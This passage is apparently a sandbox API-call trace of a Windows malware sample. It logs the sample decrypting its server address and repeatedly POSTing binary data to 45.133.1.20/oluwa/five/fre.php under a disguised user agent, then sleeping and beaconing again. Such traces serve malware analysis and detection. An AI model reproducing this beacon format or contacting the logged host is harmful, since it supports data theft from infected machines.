(lpLibFileName="ADVAPI32") returned 0x74810000 [0184.179] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.179] GetProcessHeap () returned 0x6a0000 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf550 | out: hHeap=0x6a0000) returned 1 [0184.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.180] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0184.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.181] CryptDestroyKey (hKey=0x6ad020) returned 1 [0184.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.182] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0184.182] GetProcessHeap () returned 0x6a0000 [0184.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0184.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.183] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0184.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.184] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0184.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.188] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0184.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.189] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0184.189] GetProcessHeap () returned 0x6a0000 [0184.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0184.189] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0184.190] GetProcessHeap () returned 0x6a0000 [0184.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0184.190] GetProcessHeap () returned 0x6a0000 [0184.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0184.190] GetProcessHeap () returned 0x6a0000 [0184.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0184.191] GetProcessHeap () returned 0x6a0000 [0184.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0184.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.192] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.198] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0184.204] GetProcessHeap () returned 0x6a0000 [0184.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0184.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.205] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0184.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.206] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.207] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.207] GetProcessHeap () returned 0x6a0000 [0184.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0184.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.208] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0184.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.209] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0184.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.211] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0184.211] GetProcessHeap () returned 0x6a0000 [0184.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0184.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.212] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0184.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.213] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0184.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.214] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0184.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.216] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0184.216] GetProcessHeap () returned 0x6a0000 [0184.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0184.216] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf620*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0184.216] GetProcessHeap () returned 0x6a0000 [0184.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0184.216] socket (af=2, type=1, protocol=6) returned 0x424 [0184.216] connect (s=0x424, name=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0184.248] FreeAddrInfoW (pAddrInfo=0x6bf620*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0184.248] GetProcessHeap () returned 0x6a0000 [0184.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0184.248] GetProcessHeap () returned 0x6a0000 [0184.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0184.249] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0184.250] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0184.250] GetProcessHeap () returned 0x6a0000 [0184.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0184.250] GetProcessHeap () returned 0x6a0000 [0184.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0184.250] GetProcessHeap () returned 0x6a0000 [0184.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0184.250] GetProcessHeap () returned 0x6a0000 [0184.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0184.251] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0184.252] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0184.252] GetProcessHeap () returned 0x6a0000 [0184.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0184.252] GetProcessHeap () returned 0x6a0000 [0184.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0184.252] send (s=0x424, buf=0x6bbd20*, len=242, flags=0) returned 242 [0184.253] send (s=0x424, buf=0x6bb998*, len=159, flags=0) returned 159 [0184.253] GetProcessHeap () returned 0x6a0000 [0184.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0184.253] recv (in: s=0x424, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0184.333] GetProcessHeap () returned 0x6a0000 [0184.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0184.333] GetProcessHeap () returned 0x6a0000 [0184.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0184.334] GetProcessHeap () returned 0x6a0000 [0184.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0184.334] GetProcessHeap () returned 0x6a0000 [0184.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0184.335] closesocket (s=0x424) returned 0 [0184.335] GetProcessHeap () returned 0x6a0000 [0184.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0184.335] GetProcessHeap () returned 0x6a0000 [0184.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0184.336] GetProcessHeap () returned 0x6a0000 [0184.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0184.337] GetProcessHeap () returned 0x6a0000 [0184.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0184.337] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1100) returned 0x424 [0184.339] Sleep (dwMilliseconds=0xea60) [0184.342] GetProcessHeap () returned 0x6a0000 [0184.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0184.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.343] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.351] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0184.358] GetProcessHeap () returned 0x6a0000 [0184.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0184.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.360] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0184.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.361] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.363] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.363] GetProcessHeap () returned 0x6a0000 [0184.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0184.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.365] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0184.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.366] CryptDestroyKey (hKey=0x6ad020) returned 1 [0184.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.372] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0184.372] GetProcessHeap () returned 0x6a0000 [0184.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0184.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.373] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0184.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.374] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0184.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.375] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0184.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.376] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0184.376] GetProcessHeap () returned 0x6a0000 [0184.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0184.377] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0184.377] GetProcessHeap () returned 0x6a0000 [0184.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0184.378] GetProcessHeap () returned 0x6a0000 [0184.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0184.378] GetProcessHeap () returned 0x6a0000 [0184.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0184.378] GetProcessHeap () returned 0x6a0000 [0184.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0184.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.380] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.387] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0184.395] GetProcessHeap () returned 0x6a0000 [0184.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0184.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.396] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0184.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.397] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.398] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.398] GetProcessHeap () returned 0x6a0000 [0184.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0184.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.400] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0184.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.401] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0184.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.402] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0184.402] GetProcessHeap () returned 0x6a0000 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0184.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.403] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0184.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.404] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0184.405] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.406] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0184.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.407] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0184.407] GetProcessHeap () returned 0x6a0000 [0184.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0184.407] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf3c8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0184.407] GetProcessHeap () returned 0x6a0000 [0184.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0184.407] socket (af=2, type=1, protocol=6) returned 0x428 [0184.408] connect (s=0x428, name=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0184.432] FreeAddrInfoW (pAddrInfo=0x6bf3c8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0184.432] GetProcessHeap () returned 0x6a0000 [0184.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0184.432] GetProcessHeap () returned 0x6a0000 [0184.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0184.433] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0184.434] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0184.434] GetProcessHeap () returned 0x6a0000 [0184.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0184.434] GetProcessHeap () returned 0x6a0000 [0184.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0184.435] GetProcessHeap () returned 0x6a0000 [0184.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0184.435] GetProcessHeap () returned 0x6a0000 [0184.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0184.439] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0184.440] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0184.440] GetProcessHeap () returned 0x6a0000 [0184.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0184.440] GetProcessHeap () returned 0x6a0000 [0184.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0184.441] send (s=0x428, buf=0x6bbd20*, len=242, flags=0) returned 242 [0184.442] send (s=0x428, buf=0x6bb998*, len=159, flags=0) returned 159 [0184.442] GetProcessHeap () returned 0x6a0000 [0184.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0184.442] recv (in: s=0x428, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0184.519] GetProcessHeap () returned 0x6a0000 [0184.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0184.520] GetProcessHeap () returned 0x6a0000 [0184.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0184.521] GetProcessHeap () returned 0x6a0000 [0184.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0184.521] GetProcessHeap () returned 0x6a0000 [0184.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0184.522] closesocket (s=0x428) returned 0 [0184.523] GetProcessHeap () returned 0x6a0000 [0184.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0184.523] GetProcessHeap () returned 0x6a0000 [0184.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0184.523] GetProcessHeap () returned 0x6a0000 [0184.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0184.524] GetProcessHeap () returned 0x6a0000 [0184.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0184.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1114) returned 0x428 [0184.544] Sleep (dwMilliseconds=0xea60) [0184.549] GetProcessHeap () returned 0x6a0000 [0184.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0184.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.550] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.581] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0184.594] GetProcessHeap () returned 0x6a0000 [0184.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0184.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.599] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0184.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.601] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.602] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.602] GetProcessHeap () returned 0x6a0000 [0184.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0184.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.603] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0184.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.604] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0184.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.605] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0184.605] GetProcessHeap () returned 0x6a0000 